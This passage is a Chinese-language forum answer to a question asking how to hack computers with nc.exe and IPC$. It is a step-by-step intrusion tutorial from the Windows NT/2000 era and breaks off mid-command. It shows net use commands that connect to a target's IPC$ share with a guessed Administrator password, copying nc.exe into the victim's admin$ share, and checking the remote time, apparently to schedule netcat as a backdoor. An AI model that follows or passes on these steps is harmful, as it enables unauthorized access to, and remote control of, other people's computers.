怎样用nc.exe和IPC$入侵电脑？入侵时使用地命令是什么？~~~跪谢!!!!!!

IPC入侵攻略！其实针对IPC漏洞入侵的方法目前已经有很多的教程，但是其中很多教程并不完整，所以还是有很多网友来信问我关于IPC漏洞入侵的有关问题，这就是我写这篇文章的原因了。如果你觉得本文也不完整，那只好去找更好的版本了，但是我希望你能把你的意见和建议告诉我，让我不断的完善这篇文章。本文参考了小榕的流光2000说明文档及其它相关文档，也包含了一些自己的心得体会。本文欢迎非商业性转载，但请保持文章完整性并注明出处！：-）

IPC是Internet Process Connection的缩写，也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能，特点是在同一时间内，两个IP之间只允许建立一个连接。好了，废话少说，现在进入主题。

如何找到具有IPC漏洞的主机呢？以前我都是组合一个国外的扫描工具（名字我忘了）和KillUSA的LetMeIn，因为很多工作都是手工完成的，所以速度可想而知了。现在因为有了小榕的流光2000，所以找到这样的主机实在是太简单了，具体操作我就不说了，大家可以参考该软件的说明文档。

好了，假设我们已经找到了一台这样的主机，地址是139.223.200.xxx，管理员帐号是Administrator，密码是123456。进入命令行方式，正式开工。需要说明的是，以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。

F:\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator"
命令成功完成。

F:\》copy nc.exe \\139.223.200.xxx\admin$
已复制 1 个文件。

F:\》net time \\139.223.200.xxx
\\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25
在 \\139.223